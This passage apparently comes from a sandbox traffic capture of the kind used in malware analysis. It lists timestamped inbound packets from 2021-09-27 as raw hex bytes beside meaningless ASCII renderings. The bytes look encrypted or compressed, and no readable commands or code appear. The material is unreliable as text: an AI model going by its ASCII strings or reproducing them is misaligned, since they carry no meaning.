92 e5 6a 74 4d 68 37 23 e2 87 ff 66 4e ea cc 67 c8 eb 39 66 d7 eb 01 cb 5a 08 1e bf d0 c0 33 5f 54 45 fe b1 84 4d c7 fe c1 b2 f9 3c ee 60 22 56 48 50 19 82 e7 70 32 56 ba 79 6a
                                                                    Data Ascii: $^:\bTgksrn:GDq8?!3Y1U%RN2)Og1"a}t*7DlLUYO"Z/AwDU+25XtHMb?2VF3+6{cFG&r;:sM25={L=ijtMh7#fNg9fZ3_TEM<`"VHPp2Vyj
                                                                    2021-09-27 12:27:48 UTC130INData Raw: 39 7d 65 04 45 f2 5d 6c 08 ac 21 52 de c4 fd 02 6b cc 54 6a 4d d1 38 2c 73 03 13 e2 ff 70 1b bf b3 66 cd da f6 87 60 94 37 0c c2 b8 92 09 bc 22 74 22 4d 6e 16 9e 7e 62 a1 54 67 6b 05 21 9a 8e 54 bc d1 17 0e 95 84 55 76 39 48 5f da 9d 53 1e 3e e0 87 db 22 20 c9 03 9e 04 59 b8 f8 33 87 aa a4 ce 0e 1b f3 99 57 3a 42 08 78 99 d2 90 9d 96 6e 7f 89 3b ae 31 0d 34 cc 49 de ad c3 9d 2b 34 bf a8 a7 02 5d 8b 49 50 a3 45 75 ee a8 56 29 6d f0 1b a1 db 9d 34 32 e7 71 e4 4c c1 59 7b d4 4f 74 a5 84 1a 7c 87 af cc 6c 9c a3 58 ea 7a 09 70 4f 7d 02 10 87 5e eb 34 f9 b7 58 59 eb 4d db f7 fe e0 66 c8 df bc 19 d1 12 97 30 56 df 88 3e 96 df 2d f4 bf 26 08 36 7d ed 8b 38 f2 e0 61 02 44 70 cf ff 52 02 16 17 02 f4 96 c2 4f 32 33 37 48 35 a4 68 8d ec 62 ed 4f 68 31 93 45 d4 74 41
                                                                    Data Ascii: 9}eE]l!RkTjM8,spf`7"t"Mn~bTgk!TUv9H_S>" Y3W:Bxn;14I+4]IPEuV)m42qLY{Ot|lXzpO}^4XYMf0V>-&6}8aDpRO237H5hbOh1EtA
                                                                    2021-09-27 12:27:48 UTC131INData Raw: f3 f7 f0 8e 41 a1 ef d1 40 eb 90 6e 9d 1f 03 e5 71 f0 0e 85 90 d1 5f 3f 48 33 2d 52 0f 8c e5 86 85 bd 95 70 8f 19 0a 60 f5 be e1 4f c6 c2 5f bc da a2 ff 7e 9c f9 27 50 3d cd 0b e5 ec b9 8d c3 f5 4a 50 73 a1 44 b7 34 cb da 0b 99 71 ee a1 57 e0 bd f4 d6 ce d1 90 34 94 99 33 48 98 ba 04 5d 36 c6 93 94 d5 63 a7 ae 7c 71 5f 60 10 2e a9 e7 58 21 3f 6b 5b e9 a9 20 9f 18 6e a7 4f 81 50 83 30 87 5c aa d4 68 73 73 81 8f 3b b4 e7 77 2e 38 60 11 56 91 a1 1d 7e 16 28 72 c7 e4 80 c5 f5 6a a0 cb 59 7b 0a d8 20 0c cf 41 bb af c3 c9 47 57 cb ec 4d bd 86 83 c7 b8 72 2d 41 8c a0 1d 03 51 7e 7a 6e 34 e1 48 8c 85 2d e9 e9 1e 50 c4 3e 84 ef 05 df a6 8c 11 a6 81 ff 34 88 4a 65 83 e5 70 d0 5d 3f 86 6b 78 25 51 73 1c 32 54 22 ee 87 e7 88 b3 26 27 df bc 36 23 aa da 48 b0 1d ec 45
                                                                    Data Ascii: A@nq_?H3-Rp`O_~'P=JPsD4qW43H]6c|q_`.X!?k[ nOP0\hss;w.8`V~(rjY{ AGWMr-AQ~zn4H-P>4Jep]?kx%Qs2T"&'6#HE
                                                                    2021-09-27 12:27:48 UTC132INData Raw: 32 eb 39 fc d2 da 1e ed 7a 88 36 92 d2 e0 f7 72 d2 3b 7d 98 a9 4b e7 03 eb 34 87 3f ca 4d 34 50 f6 ab 19 82 7d 75 3c 4a 9c 59 eb 77 fb 42 da 77 70 3b d6 c9 32 f8 b4 48 86 66 ce 0a 18 d1 d4 59 ab 27 ce 47 23 f3 49 f1 fb 1d 4a 73 11 bf 38 f2 87 97 0c 97 8a d3 58 9a 6d 2e d0 cf ae 4f 91 3e 2a 95 fb 66 48 ab 69 a9 30 38 4f cd 63 26 7e 51 89 64 90 c8 d3 f6 92 a1 34 4c 1a 85 fb f5 88 56 22 2b f3 ac a2 a4 a5 96 b6 1e 58 e2 df 32 3d 2a c2 14 6d fe 3d 78 3e d9 dd 56 a6 02 d0 7f ef 97 01 c7 c1 57 18 7b 57 6b 5c 5b 44 73 80 26 57 0a 40 86 8a fc 93 a2 5e dd f5 0d 33 ac 56 54 c0 09 8a f0 27 49 6d 07 00 33 b3 46 a5 d2 87 29 8c a4 a0 22 a5 ab db b3 59 6b bb 9f 9b 39 d4 59 4a 2d 73 0e 0f af fd 5d c0 3f 99 29 49 c8 b0 03 f6 52 4c f9 1d 55 d4 de 9b d0 54 76 6b 33 08 82 35
                                                                    Data Ascii: 29z6r;}K4?M4P}u<JYwBwp;2HfY'G#IJs8Xm.O>*fHi08Oc&~Qd4LV"+X2=*m=x>VW{Wk\[Ds&W@^3VT'Im3F)"Yk9YJ-s]?)IRLUTvk35
                                                                    2021-09-27 12:27:48 UTC134INData Raw: c8 b5 41 05 59 45 23 6e 74 23 d5 65 bc 25 72 6d ec d0 00 f1 ef 53 fe 15 68 94 2c 77 23 11 8b f7 70 81 85 91 5c c6 f8 d4 80 4a 16 69 e1 d3 b8 96 36 18 0a 59 20 d7 4d 11 0d 26 db 0e 54 63 4b 06 57 92 8e ce 81 d4 2b 2a b5 a1 7e f0 47 f1 20 ca 99 73 ac 16 cd 85 41 01 27 5d 5b 27 aa 59 bc d8 37 ff a2 a4 54 34 3f c9 92 75 1e 45 22 fe c7 ce 81 9d 92 51 c6 a1 16 ac ab 2e 33 58 11 67 1c c3 99 0b 31 3c a0 a7 98 67 af 73 5b 81 60 72 c4 2a 08 3e 7c f0 1f 9e 61 b5 19 30 7d 52 e3 db 99 e0 cb d4 4b 54 a3 0e 12 7c 1d 90 c9 53 b8 83 78 c1 f8 77 c9 d7 6d 06 30 2a 53 c3 19 61 92 73 62 4b 13 f0 f6 fe e4 66 60 d6 bc 19 5c 1f 97 20 70 f9 85 bd e8 46 0c 52 ab 06 bb 29 74 c5 3c 1f df f7 6d a4 89 e9 ce ff 76 b2 36 16 02 ed 24 ca 60 20 13 3d e6 4a 3d 69 ad 47 52 59 4f 77 23 21 4d
                                                                    Data Ascii: AYE#nt#e%rmSh,w#p\Ji6Y M&TcKW+*~G sA']['Y7T4?uE"Q.3Xg1<gs[`r*>|a0}RKT|Sxwm0*SasbKf`\ pFR)t<mv6$` =J=iGRYOw#!M
                                                                    2021-09-27 12:27:48 UTC135INData Raw: 9f 54 c1 4a 9d fb 8a 61 f6 c9 f9 6d 73 b5 45 a5 bf 5d 34 71 f0 0a 85 90 c3 5f 3f cd 19 28 6d 2b ac 37 ac 03 c3 2c e3 84 1d 2a 36 d1 96 cc d7 e3 e9 67 1c 84 72 ff 7e 98 f9 11 42 3d cd 8e e4 e9 86 a9 e3 26 60 d6 0d 18 f2 bc 30 eb 8f 2e b1 5c 76 84 7c d8 1d aa 05 ce d1 94 34 45 8a 33 48 1d 8c 01 62 12 e6 43 be 53 1d 1e 74 77 75 7f 34 30 06 84 7f 7d 0a 07 cb 05 3b a9 20 9b 18 a3 b4 4f 81 d5 82 35 b8 78 8a 05 42 f5 0d 38 72 30 b0 c7 24 0e 10 4d 89 73 ba 99 bd 20 c3 28 72 c3 e4 66 d6 f5 6a 25 cb 5c 44 2e f8 fe 26 49 3f 02 b3 cf cd 67 05 eb c4 60 25 a3 a8 ff 18 2c f9 41 8c a4 1d b9 42 7e 7a eb 35 e4 77 a8 a5 f2 c3 6f 60 e9 fb 32 80 cf 54 ff 8e a1 89 83 aa c7 94 d6 9d 65 83 e1 70 8d 4e 3f 86 ee 7f 20 6e 57 3c ee 7e a4 90 3e b9 84 b7 06 77 ff 94 1b bb 8f f1 70 10
                                                                    Data Ascii: TJamsE]4q_?(m+7,*6gr~B=&`0.\v|4E3HbCStwu40}; O5xB8r0$Ms (rfj%\D.&I?g`%,AB~z5wo`2TepN? nW<~>wp
                                                                    2021-09-27 12:27:48 UTC136INData Raw: fb ec fa d7 e7 11 d1 f0 c6 16 c7 fc eb 87 be d0 e4 d1 37 55 45 e4 03 8c 62 d5 de cb 5b 86 a5 ef 40 82 63 d6 50 06 a2 55 78 1d 44 9a 73 72 04 4a 6e d8 73 56 61 55 b7 ab 63 91 61 b4 bc ee 7a 19 4b f1 54 7e 14 ee bb 3c fe 61 fc c9 13 4c 59 89 e9 8c f1 87 95 06 60 f5 4a 59 00 4c 23 3f e9 8e 3e 0a 1b 07 a7 0c 53 b5 ab 76 a5 38 2d 43 cd 65 13 e3 07 3d 67 90 ca d9 06 ed 38 35 d6 3b 88 17 d3 a8 24 b9 0e de 9d 59 91 5b 96 a9 14 50 9c d3 32 3b 17 6c 47 f6 ff 3b 56 9c d4 45 57 a6 9c d5 ad fd b1 21 2e e5 7a 09 7d 90 81 5c 5b 5b 58 fc 05 55 0a 5c 84 21 80 0a a5 74 5b ab e0 33 ac 52 ee e5 25 98 d6 9d 18 41 16 26 33 41 52 a5 d2 b8 47 aa 89 a2 3a 8b ac 5b cd c6 40 3d e5 22 4d d5 5d 6a b6 57 23 1e 13 f8 05 d3 19 b9 08 60 de b0 23 b1 74 61 fb 02 4d d6 71 e7 49 53 5c e9 6d
                                                                    Data Ascii: 7UEb[@cPUxDsrJnsVaUcazKT~<aLY`JYL#?>Sv8-Ce=g85;$Y[P2;lG;VEW!.z}\[[XU\!t[3R%A&3ARG:[@="M]jW#`#taMqIS\m
                                                                    2021-09-27 12:27:48 UTC137INData Raw: 06 a8 9b 43 b6 4c 81 7e 65 02 4f 9f 34 f5 09 b1 0d 5f 71 c4 fb 28 73 97 e0 79 6b f5 b5 ba 72 03 33 10 d2 5d 0a 86 9c d8 e1 d8 f6 a1 b8 01 49 95 d9 90 bb 2b 12 24 5e a4 a9 d2 3a 8f 5c 62 98 55 67 6b bf 73 bf 9c 72 84 6e 3b 0c 95 a2 89 e7 47 d1 41 ca b1 5e b3 3e e6 ad c7 79 94 da 25 ba 8b c1 b9 f8 13 64 87 89 dc 37 32 43 b5 55 3a 64 24 e6 e7 4b 8e 90 ba 63 cd 89 3d 84 2d 56 80 df 6f fa 3d 5a 9c 2b 14 a7 85 8a 10 64 a2 f8 7c a1 45 53 d7 32 28 b0 73 ff 37 ac 68 9d 32 18 ff 2a 50 5c e7 7d ea 4e 4e 74 85 95 37 51 96 93 c4 db 9f a3 5e e0 da 6f e9 4e 65 2e 1d 37 5e ed 1e e5 ec ec 49 cd 69 49 6c ff e0 46 dd f2 91 0b e0 1a 21 33 56 d9 82 98 f0 46 2c eb a7 2e 96 34 7d eb 3b 9b a1 68 46 22 f3 50 53 fe 72 92 84 32 2f ff 98 cf d1 33 35 1d ee 0b 25 69 8d f7 4b 71 62 6a
                                                                    Data Ascii: CL~eO4_q(sykr3]I+$^:\bUgksrn;GA^>y%d72CU:d$Kc=-Vo=Z+d|ES2(s7h2*P\}NNt7Q^oNe.7^IiIlF!3VF,.4};hF"PSr2/35%iKqbj
                                                                    2021-09-27 12:27:48 UTC139INData Raw: 59 01 74 93 f2 03 d2 9c fb ae 3b a7 c8 f9 72 f1 b8 45 b5 99 7b 56 f2 8e 93 a4 44 d5 7f 82 d3 16 00 da 0c 81 20 a0 a5 00 b4 e2 84 39 98 66 d0 96 d1 65 eb c6 75 3c 8e b9 80 e7 99 d9 f6 70 83 cc 91 c0 5b 8e 86 f2 06 6a ee 72 81 f3 9c ad d2 c5 2f ad 74 c1 a3 51 cc 11 0c 31 56 d0 94 10 62 26 32 48 02 05 0c 62 02 c0 65 2b d4 63 87 55 e8 68 5f 7f 2e 0f ac c8 5a 27 13 c7 a3 0e 31 21 9b 3c 99 67 4e 81 ca 3c 38 b8 68 ac 23 a8 72 73 a1 53 98 ad e7 68 10 3c 65 3e 54 97 8d b1 82 f1 b0 73 c3 c0 78 04 f4 6a 3a 74 51 44 3d de d8 cd ce 41 9b 92 1b d0 47 48 f4 ec 4d bd 86 83 c7 bc 72 2d 41 8c a0 1d 18 50 7e 7a 6e 34 e1 4b 8c 85 36 e8 e9 1e 50 26 2b 84 ef 04 d6 a3 a3 13 a0 ad 53 cc 6f d2 64 87 c1 93 0b 5d 3f 1c d4 70 1a 65 75 ff e9 54 22 ce 43 a1 84 b3 39 35 d6 b9 19 21 ac
                                                                    Data Ascii: Yt;rE{VD 9feu<p[jr/tQ1Vb&2Hbe+cUh_.Z'1!<gN<8h#rsSh<e>Tsxj:tQD=AGHMr-AP~zn4K6P&+Sod]?peuT"C95!
                                                                    2021-09-27 12:27:48 UTC140INData Raw: 66 fd 6b c3 fe dc e8 08 38 fc f2 e6 7d f6 7a 95 01 aa f8 cd f3 58 52 6f 62 e7 30 4e c7 fc cb d0 86 a5 ef fa 03 5b c4 76 39 66 7c 55 1f 64 1e 42 f4 7a cc 66 f0 5a 74 11 52 9d 2d 87 2d 4d a6 9e ee ef 19 4b f1 ee 9f 2c fc 9d 03 16 48 d1 cb 33 c1 68 0f 97 0a fa af bc 24 11 f2 60 df e4 f0 0f 2d cb 8e a9 0a 1b 07 1d f8 6b a7 8d 49 4f 11 00 41 ed f6 22 65 79 bb 6d b8 e3 fb 74 ea 12 b7 32 87 a4 05 f1 a8 b1 b9 0e de 27 a1 a9 4a b0 96 f9 79 b1 d1 12 9d 26 ea 39 73 d6 16 50 bc a1 6e d5 d8 9f f1 80 eb b7 e9 5c e4 7a 93 78 5a 85 7a 7b ac 52 d4 28 77 ac 41 ae a7 e3 bb 89 76 5f 8d be b4 d2 cb 75 c0 0c aa 19 bc 6c 40 8c 03 3e a1 61 85 3b a6 71 82 84 0d 21 8d 86 c6 b9 77 6c 3f e1 04 12 52 23 f3 2d 72 0a 2f df d9 70 d2 83 9c 05 5a ee 90 c9 ad 5c 4c d9 b5 50 fc f3 86 db 7a
                                                                    Data Ascii: fk8}zXRob0N[v9f|UdBzfZtR--MK,H3h$`-kIOA"eymt2'Jy&9sPn\zxZz{R(wAv_ul@>a;q!wl?R#-r/pZ\LPz
                                                                    2021-09-27 12:27:48 UTC141INData Raw: 75 44 44 b9 a0 a4 74 b0 66 16 7f 65 22 4f 69 23 f5 16 a0 0d 5f 71 c4 fb 28 77 97 e0 79 6b f5 b5 27 71 03 33 10 d2 5d 09 86 9c 45 e2 d8 f6 a1 66 0b 49 95 dc b5 be 04 10 22 72 08 51 35 a2 8e 58 46 2f 58 65 6b 25 cc b7 a3 46 82 d9 36 0e 95 82 5f c9 5a d1 5e c5 97 5b 9c 3c e0 81 6b 81 73 42 24 be af 79 b5 fa 13 fe 38 81 e3 03 34 fb b9 57 3a 44 02 b9 fa 4b 91 82 80 66 e2 8b 3b a8 81 ae 67 47 6e fe 19 e3 93 29 14 3d 3a 82 2f 50 a4 41 73 a3 45 73 e4 73 35 b0 6c ef 0c a9 47 9f 34 34 57 d2 b7 c4 e6 79 ce f4 40 76 85 0f 88 59 aa a7 c2 61 91 a1 5e c0 d8 1b f4 4e 7d 19 26 1d 73 e9 34 65 b8 f3 36 54 6c 69 f3 de f0 44 47 d7 26 3c eb 28 9c 12 46 db a2 bc c8 c4 31 f4 bb 19 ac 1e 50 ef 11 1b f5 77 39 bb f6 70 cb df 63 90 1e 17 98 c8 93 fd 6b 12 24 1f ce 4b 1d f0 90 e8 42
                                                                    Data Ascii: uDDtfe"Oi#_q(wyk'q3]EfI"rQ5XF/Xek%F6_Z^[<ksB$y84W:DKf;gGn)=:/PAsEss5lG44Wy@vYa^N}&s4e6TliDG&<(F1Pw9pck$KB
                                                                    2021-09-27 12:27:48 UTC143INData Raw: a9 b3 46 e5 2d 66 b1 f2 8e d1 9c fb 14 64 93 da df 4d d8 92 68 b7 b9 b9 5c 70 f0 15 ae 6c fc 5d 3f d4 3c 82 3e b0 ad 31 82 a5 8f b7 e2 84 83 2f 52 c1 b0 ec 7f c4 c4 75 1a 6b 1b fe 7e 85 f1 df 52 3d cb bb 46 bf 32 aa e3 24 6a 63 71 81 f3 26 11 e6 d7 09 91 6f ee a1 51 ea ed aa 4f cf ce a5 3c 6f 9b 33 4e 28 19 57 d6 11 e6 41 b4 e1 61 87 75 ed 54 72 6d 17 26 b0 e7 58 27 35 ea 04 70 a8 3f 91 10 94 a5 4f 87 e0 20 63 0c 7b 8a 07 48 46 71 a1 73 aa 91 ca 7a 29 30 78 11 56 97 ab 8a 21 8f 29 6d ec ec 75 c7 f5 6c 10 68 0a f0 2d f8 fc 2c f9 43 9b b2 55 ec 6a 5a cc e4 56 bd 86 85 cd 7e 2d b4 40 93 af 15 f7 53 7e 7c de 97 b2 c3 ab a5 f0 c9 de 1c 70 fa a8 a1 c2 08 d8 ae 96 11 a6 87 f5 f9 d7 d3 64 9c e8 78 27 5f 3f 80 db df 76 da 54 3c ec 74 1a ec a7 b8 1e 96 0b 29 d8 b4
                                                                    Data Ascii: F-fdMh\pl]?<>1/Ruk~R=F2$jcq&oQO<o3N(WAauTrm&X'5p?O c{HFqsz)0xV!)mulh-,CUjZV~-@S~|pdx'_?vT<t)
                                                                    2021-09-27 12:27:48 UTC144INData Raw: 16 70 d1 4b 65 4e e8 c6 7c b6 72 38 fc f6 e6 48 ef 7a 95 84 9a fd f2 d7 78 0c 47 e4 99 89 3a e4 f8 eb 2b 9f 8d c2 62 26 70 fc d6 67 1b 7c 55 1b 64 c5 5b f4 7a 49 4a f5 65 50 31 0d b5 ab f9 94 c1 85 9a ce 15 17 63 dc 76 ba 07 c4 39 5d 6a 48 d1 cf 33 10 71 0f 97 8f d5 aa 80 00 31 ae 48 59 9a 49 92 0e cf ae 51 23 36 05 87 db 6c 33 d5 f0 a8 10 04 61 96 61 39 65 e3 81 4b 82 e8 d9 2f ee 38 35 6c ba 86 05 f5 97 4e 90 23 dc bd 82 ae d9 e8 2f 1f 78 b5 f1 6e 3f 3d ea a3 4a d3 2a 74 9c fb 46 57 a6 26 4c a3 ef 97 1b 75 c9 78 09 5b 5d 16 22 c2 45 53 d0 08 0a 08 5a ae 3d db be b5 52 7f d6 96 32 ac 72 b4 e3 08 8a ee 95 41 42 16 20 39 35 39 3c d3 a7 75 a2 fa a2 3a 8d 1c fc 9e 4d 67 1d bf 00 38 d4 7d a2 0f 72 0e 10 24 f0 5d d0 19 bf 02 ce b6 29 22 ac 58 6c a6 00 4b fc 69
                                                                    Data Ascii: pKeN|r8HzxG:+b&pg|Ud[zIJeP1cv9]jH3q1HYIQ#6l3aa9eK/85lN#/xn?=J*tFW&Lux[]"ESZ=R2rAB 959<u:Mg8}r$])"XlKi
                                                                    2021-09-27 12:27:48 UTC145INData Raw: 1c 34 63 75 64 72 b9 8d b6 4d 9f 44 39 7d 65 04 45 f2 5d 6c 08 ac 21 52 0c c6 fd 02 6b cc 54 6a 4d d1 ea 2e 73 03 13 31 d2 70 1b bf b2 66 cd da f6 87 60 90 37 0c c2 b8 92 09 92 20 74 22 4d 6e 16 9d 7e 62 8f 56 67 6b 05 9f b7 8e 54 bb e5 12 21 97 82 79 da c1 af c7 db 99 77 91 bf e2 87 41 9d 28 f6 37 98 8b d8 ba f8 13 de 47 81 ce 11 0d c6 9c 78 38 44 24 d4 61 35 08 9c 92 4a ef 0b 39 ae ab b2 3c f3 7d d8 3d 41 9f 2b 14 1d a2 81 02 42 9d 6c 55 8c 47 73 c2 00 ae ce f5 f1 1f 85 4a 1e 36 32 7d ce ec 70 f5 5f ea 57 4d 74 85 2f 1d 5a 87 b5 fb 55 b6 8e 5c c0 fe 5d 6f 30 e4 07 30 31 7e 6f 36 63 92 ef 6d e0 7f 4f d7 7a e2 46 47 f7 9f 3f c6 3a a5 26 7e f4 a0 bc ee 6c aa 8a 22 07 bb 32 5d 68 13 1d df 6b 62 0f e5 56 ef 7a 70 92 1e 37 35 cb be ef 52 25 1d 30 cc 4b 3b 43
                                                                    Data Ascii: 4cudrMD9}eE]l!RkTjM.s1pf`7 t"Mn~bVgkT!ywA(7Gx8D$a5J9<}=A+BlUGsJ62}p_WMt/ZU\]o001~o6cmOzFG?:&~l"2]hkbVzp75R%0K;C
                                                                    2021-09-27 12:27:48 UTC146INData Raw: 38 50 6e 30 84 ef 3a 47 a8 a1 13 be af f8 b0 f6 d5 4e 01 9f c9 0b 5d 3b a6 64 5f 08 43 cf 19 c5 45 04 ce 32 ba 84 b3 06 83 d8 94 1b 36 82 f1 60 36 65 5f c6 a0 05 8c b6 56 b0 fa 16 7f 65 98 4a 59 32 d3 29 3a 27 72 73 e4 41 24 f1 e9 61 50 46 f3 95 2a 59 81 4d 13 f6 70 1f 80 2b 4c e0 d8 6c a4 67 07 6f b5 54 ba 96 29 32 9c 52 22 d7 5c 13 a2 5a 42 09 7e e5 15 bc 57 92 8a 74 3c fb 3a 0c 0f a7 52 e1 61 f1 c6 d8 99 73 91 81 c6 87 41 1f 25 f6 27 be ad 73 3a 86 8a ff a2 a0 ee 88 10 db b4 cf 1f 69 33 d8 c7 d2 93 9d 92 6e 0e af 3b ae bc 00 34 dc 6f f8 37 41 e3 b2 15 3d a4 87 98 40 82 61 e7 84 68 62 e2 0a b2 b2 6c f0 3f 43 4c 9d 34 2a 55 79 cb 5d e1 53 48 aa d6 75 85 0b 32 e7 85 b5 e4 db bb 8e 4f e6 d8 ec eb 4e 7d 26 f4 13 5e eb 28 4b bf 77 48 cb 47 eb 89 67 e1 46 43
                                                                    Data Ascii: 8Pn0:GN];d_CE26`6e_VeJY2):'rsA$aPF*YMp+LlgoT)2R"\ZB~Wt<:RasA%'s:i3n;4o7A=@ahbl?CL4*Uy]SHu2ON}&^(KwHGgFC
                                                                    2021-09-27 12:27:48 UTC147INData Raw: d2 a7 51 89 8c a0 3a 92 89 f1 9e 5d 41 3b cb 84 46 4d 5c 6a 28 52 b2 0d 35 d8 ea f7 34 ab 0e 68 74 b2 23 ac 7c 56 d1 02 4b e3 e5 b1 fd 50 5c eb 67 17 fd ac 39 7c 28 46 08 d0 bf d3 06 de a3 53 98 e8 44 6f e9 90 48 87 b1 7d 7c 6f fe 22 88 46 d1 59 15 50 68 99 41 29 a8 11 38 87 bd b5 78 a1 34 1b 59 f0 28 ce 4d c6 e4 4b 12 a4 3b e5 56 b5 db f2 56 17 4b ef 59 c0 ab af c3 9f 48 50 73 1b d6 91 26 ed e5 90 b3 5c ec 81 12 e2 3b 8a 50 c1 f9 b9 16 42 9f 19 ca 7c 06 28 4f 14 c6 85 96 d5 63 1d 50 5a 60 79 5f f1 04 84 e5 78 76 3d ed 25 6e 80 0d 99 38 bf 8d cd ff 53 a7 1d 91 5a 4b 01 68 73 e9 84 5e 21 92 c7 a9 0d 10 4d 33 0f bf 8b 9b 1e a7 04 70 c3 c2 72 43 8b f3 3b ee 70 49 ee fa f8 0c 55 64 b6 a0 e9 e9 85 4a ea c4 40 de ae 85 ed 21 1d 9c 6d 8e a4 3b f0 d7 00 e3 f5 11
                                                                    Data Ascii: Q:]A;FM\j(R54ht#|VKP\g9|(FSDoH}|o"FYPhA)8x4Y(MK;VVKYHPs&\;PB|(OcPZ`y_xv=%n8SZKhs^!M3prC;pIUdJ@!m;
                                                                    2021-09-27 12:27:48 UTC148INData Raw: d8 b8 32 56 43 87 91 f9 60 0c 16 b9 06 bb 16 e4 c6 11 1d c7 d9 6a 20 f7 76 e5 7d 0c 0b 1f 17 06 cd 5d ed 4d 32 af 38 e3 5a 1b 49 6e ea 42 59 6f f3 1a 09 60 e7 4e 4a 4c ee ea d0 4e 95 a0 fd f2 c2 30 09 78 95 1e 25 f5 cd e3 7e 74 a1 e6 99 a9 6f 64 d3 eb 34 98 ae c7 4d 24 76 d0 7a 9b fc e4 54 1f 40 bc bc f6 7a d3 f5 fd 5a 67 37 74 52 a9 f9 b4 6c 08 b1 ce 0a 06 63 dc 76 ba 07 c4 3d 5d 6a 48 d1 cf 33 ac 71 0f 97 8f d5 aa 83 00 31 12 48 59 9a 49 b8 06 cf ae 50 21 33 2a 85 dd 40 9f 2d 17 30 11 00 45 ed 84 3b 65 79 3e 43 bd dc df 54 0b 3a 35 4c 3e 45 2e f5 88 49 ae 26 f3 bf 84 82 71 10 c8 87 79 b1 d5 12 d5 3f ea 39 f5 db 16 40 9a 87 ac 55 a6 06 d0 76 c4 97 01 42 ee 52 24 5f 77 92 76 d9 3a ca d5 28 53 2a b3 ac a7 fe 09 81 59 4e ad b4 db ae 52 74 e0 08 a6 f0 bd 70
                                                                    Data Ascii: 2VC`j v}]M28ZInBYo`NJLN0x%~tod4M$vzT@zZg7tRlcv=]jH3q1HYIP!3*@-0E;ey>CT:5L>E.I&qy?9@UvBR$_wv:(S*YNRtp
                                                                    2021-09-27 12:27:48 UTC150INData Raw: f5 e9 ed 3e 79 f9 32 84 75 3f d3 9c 87 33 af 84 d5 b2 d6 a3 49 83 e1 4f 38 75 12 84 f1 5b 22 c5 2b a5 e9 54 26 ce ad bb 84 b3 bc 1d d3 86 3d 01 a0 df 62 36 43 d7 69 de 9c 92 ad 7a bd 6e 14 79 4f 84 11 ed 22 f5 0d 8c 2e 71 73 c4 67 27 dc fb 5f 58 60 f2 95 2c 53 be 1e 8a f7 6f 32 88 91 4c e0 de dc 07 34 8f 48 95 c7 98 9a 2a 12 22 ee 07 fa 59 1d af 54 41 0f 54 47 8d 08 56 92 91 65 8c d4 38 0c 93 a8 f9 8e de d0 5e de b9 7e b2 3e e0 1d 64 2a 1f fd 05 b3 a8 59 b8 d8 04 d0 a2 a4 d1 33 3a f6 b6 55 3c 6e a4 80 7e 4a 91 99 b2 40 cc 89 3b 34 8e 05 0b f8 4f f0 1e c3 9d 0b 2d 13 a0 a7 1d 59 aa 4c 7f a1 43 59 46 54 b1 b1 6c f4 3f 8e 69 9d 34 a8 58 79 d8 7b c7 76 c9 d4 4f 54 d1 21 12 7c 90 9d c9 43 9e a5 74 42 86 ee e8 4e 79 26 20 36 5e eb ae 46 bf 64 6e ed 7d 6a f7 fe
                                                                    Data Ascii: >y2u?3IO8u["+T&=b6CiznyO".qsg'_X`,So2L4H*"YTATGVe8^~>d*Y3:U<n~J@;4O-YLCYFTl?i4Xy{vOT!|CtBNy& 6^Fdn}j
                                                                    2021-09-27 12:27:48 UTC151INData Raw: 6b 89 59 30 44 b3 6e 4b 46 cf 62 69 30 44 ae ba ca 15 c8 c9 2d b5 80 df 93 fb c2 ee 26 87 35 9c 21 af c7 52 03 98 28 d0 cb 76 94 de 3b 59 28 76 ea d1 66 c1 0b 11 bc 9c ea ae e4 2a 4a 25 7a 01 59 28 ec 1f 70 46 ec 44 32 cc 53 39 ce c8 dd 45 a2 09 b8 20 a5 85 7b b4 a6 e3 9d 08 c3 77 36 e3 ee ba cc 44 56 24 92 c6 8b 48 b4 b6 1d 4c cd 64 ab 21 d5 8f 9a 1e 69 8b c7 b3 9c f2 ef b2 52 25 2f 39 f1 89 d6 4b 89 b7 49 c3 3c ca e4 27 a0 56 e2 32 a4 80 fb 6d 2d ea 00 0b 7c ef 4a 2c 64 fe 4b a0 f3 7d 8d 6b 7b 33 6f 6b 31 02 8f e4 64 3c 00 f1 39 76 f7 1e 94 25 bd a4 5b 85 e4 b3 06 bb 54 ba 16 7f 5d 51 88 54 0b b6 d4 41 3f 27 6d 3b 51 9a a1 a0 2d f3 30 41 e4 f5 40 e1 cb 5a 06 31 b2 e1 c7 24 38 d7 11 86 4a 5b 1c 06 84 85 3a 13 87 52 4c 5e 20 a2 f5 67 87 5d 56 e3 1f 8a a6
                                                                    Data Ascii: kY0DnKFbi0D-&5!R(v;Y(vf*J%zY(pFD2S9E {w6DV$HLd!iR%/9KI<'V2m-|J,dK}k{3ok1d<9v%[T]QTA?'m;Q-0A@Z1$8J[:RL^ g]V
                                                                    2021-09-27 12:27:48 UTC152INData Raw: 40 e4 3e c1 4c c1 a6 1c 23 24 66 92 99 77 38 81 76 9f f8 6e 98 8d 53 6d d5 bf 7c d2 44 6e ff 27 c3 93 9e 6b 6c 6e ca 94 95 b0 7e a0 df c3 60 76 c5 f8 fa cf aa 99 ca 51 e1 cb f8 42 41 45 65 04 cf 7c 4c 63 b3 6c fd f3 10 a6 cb f9 f0 44 57 57 e9 88 d8 26 b3 88 e5 2b 8e df b7 2e 69 26 82 01 4b c6 25 0c 46 5f d1 7e 88 05 ad 4c b1 14 09 7e 7a c2 d8 93 d6 26 c0 ef b1 77 65 73 c8 09 ca 63 c6 97 14 89 2a fe e0 5f 46 6f 5d df 0b e9 85 87 7e 32 fa 5c 57 9b 68 54 02 d2 af 45 4e 47 46 93 c1 58 b0 fd 7d b2 09 25 78 b8 08 54 1a 05 8b 15 b1 ef 9a 0c 97 1e 4e 4d 65 c1 73 c9 e9 2a d9 3e b3 b0 e9 fd 6e fc c3 88 b5 76 16 e8 b2 f2 28 f7 a3 2c a7 d6 38 33 d1 dd 2d 8e 79 1c 6e 03 95 d3 78 ac d7 85 b4 1e d5 fe a9 b4 33 d2 e6 c0 b6 40 57 1b 2e 44 9c b5 7a 2e ca 5b a7 85 2d a9 35
                                                                    Data Ascii: @>L#$fw8vnSm|Dn'kln~`vQBAEe|LclDWW&+.i&K%F_~L~z&wesc*_Fo]~2\WhTENGFX}%xTNMes*>nv(,83-ynx3@W.Dz.[-5
